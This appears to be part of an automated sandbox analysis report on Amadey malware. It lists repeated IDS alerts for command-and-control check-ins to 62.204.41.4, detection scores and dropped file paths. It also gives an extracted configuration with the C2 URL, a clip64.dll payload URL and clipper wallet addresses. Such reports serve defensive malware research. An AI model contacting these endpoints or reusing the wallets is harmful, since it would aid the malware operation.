                          Source Port:50015
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449974802027700 02/06/23-14:18:04.837734
                          SID:2027700
                          Source Port:49974
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449977802027700 02/06/23-14:18:05.552322
                          SID:2027700
                          Source Port:49977
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450247802027700 02/06/23-14:19:18.456525
                          SID:2027700
                          Source Port:50247
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449714802027700 02/06/23-14:16:34.963073
                          SID:2027700
                          Source Port:49714
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449885802027700 02/06/23-14:17:41.119392
                          SID:2027700
                          Source Port:49885
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450155802027700 02/06/23-14:18:54.353665
                          SID:2027700
                          Source Port:50155
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449888802027700 02/06/23-14:17:41.840855
                          SID:2027700
                          Source Port:49888
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449806802027700 02/06/23-14:17:19.119476
                          SID:2027700
                          Source Port:49806
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449799802027700 02/06/23-14:17:17.417286
                          SID:2027700
                          Source Port:49799
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450244802027700 02/06/23-14:19:17.729582
                          SID:2027700
                          Source Port:50244
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449717802027700 02/06/23-14:16:38.110725
                          SID:2027700
                          Source Port:49717
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449908802027700 02/06/23-14:17:46.800738
                          SID:2027700
                          Source Port:49908
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450040802027700 02/06/23-14:18:22.709350
                          SID:2027700
                          Source Port:50040
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450199802027700 02/06/23-14:19:04.853144
                          SID:2027700
                          Source Port:50199
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449796802027700 02/06/23-14:17:16.378790
                          SID:2027700
                          Source Port:49796
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450158802027700 02/06/23-14:18:55.072147
                          SID:2027700
                          Source Port:50158
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450028802027700 02/06/23-14:18:19.806368
                          SID:2027700
                          Source Port:50028
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450069802027700 02/06/23-14:18:30.250801
                          SID:2027700
                          Source Port:50069
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449920802027700 02/06/23-14:17:49.692974
                          SID:2027700
                          Source Port:49920
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449831802027700 02/06/23-14:17:25.452284
                          SID:2027700
                          Source Port:49831
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450219802027700 02/06/23-14:19:11.621916
                          SID:2027700
                          Source Port:50219
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449701802027700 02/06/23-14:16:31.297623
                          SID:2027700
                          Source Port:49701
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449742802027700 02/06/23-14:16:53.631837
                          SID:2027700
                          Source Port:49742
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450012802027700 02/06/23-14:18:15.955153
                          SID:2027700
                          Source Port:50012
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449819802027700 02/06/23-14:17:22.395201
                          SID:2027700
                          Source Port:49819
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449949802027700 02/06/23-14:17:58.849591
                          SID:2027700
                          Source Port:49949
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450142802027700 02/06/23-14:18:50.911528
                          SID:2027700
                          Source Port:50142
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450101802027700 02/06/23-14:18:39.586156
                          SID:2027700
                          Source Port:50101
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450272802027700 02/06/23-14:19:24.480080
                          SID:2027700
                          Source Port:50272
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450231802027700 02/06/23-14:19:14.506549
                          SID:2027700
                          Source Port:50231
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllAvira URL Cloud: Label: malware
                          Source: file.exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dllReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeReversingLabs: Detection: 51%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeReversingLabs: Detection: 81%
                          Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllReversingLabs: Detection: 80%
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoe Sandbox ML: detected
                          Source: 0.3.file.exe.4aa7620.0.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                          Source: 20.2.rundll32.exe.6e7e0000.0.unpackMalware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010C2F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01092F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_01092F1D

                          Compliance

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeUnpacked PE file: 2.2.ajAf.exe.400000.0.unpack
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: wextract.pdb source: file.exe, bjAg.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000008.00000000.443385689.000000000019E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000009.00000000.445170122.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000009.00000002.828007613.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000015.00000000.451693507.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000015.00000002.452166128.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe.0.dr, mnolyk.exe.8.dr
                          Source: Binary string: Healer.pdb source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414918695.00000000025B0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: wextract.pdbGCTL source: file.exe, bjAg.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bjAg.exe, 00000001.00000003.308200379.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, bjAg.exe, 00000001.00000003.308124851.0000000004873000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.415603805.0000000000792000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                          Source: Binary string: _.pdb source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000014.00000002.827912783.000000006E7EF000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.9.dr, clip64[1].dll.9.dr
                          Source: Binary string: Healer.pdbH5 source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414918695.00000000025B0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\vot.pdb source: bjAg.exe, 00000001.00000003.308124851.000000000485F000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000000.308294007.0000000000401000.00000020.00000001.01000000.00000005.sdmp, ajAf.exe.1.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_010C2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01092390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_01092390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0018FC58 FindFirstFileExW,8_2_0018FC58

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49691 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49692 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49693 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49694 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49695 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49696 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49697 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49698 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49699 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49700 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49701 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49702 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49703 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49704 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49705 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49706 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49707 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49708 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49709 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49710 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49711 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49712 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49713 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49714 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49715 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49716 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49717 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49718 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49719 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49720 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49721 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49722 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49723 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49724 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49725 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49726 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49727 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49728 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49729 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49730 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49731 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49732 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49733 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49734 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49735 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49736 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49737 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49738 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49739 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49740 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49741 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49742 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49743 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49744 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49745 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49746 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49747 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49748 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49749 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49750 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49751 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49752 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49753 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49754 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49755 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49756 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49757 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49758 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49759 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49760 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49761 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49762 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49763 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49764 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49765 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49766 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49767 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49768 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49769 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49770 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49771 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49772 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49773 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49774 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49775 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49776 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49777 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49778 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49779 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49780 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49781 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49782 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49783 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49784 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49785 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49786 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49787 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49788 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49789 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49790 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49791 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49792 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49793 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49794 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49795 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49796 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49797 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49798 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49799 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49800 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49801 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49802 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49803 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49804 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49805 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49806 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49807 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49808 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49809 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49810 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49811 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49812 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49813 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49814 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49815 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49816 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49817 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49818 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49819 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49820 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49821 -> 62.204.41.4:80
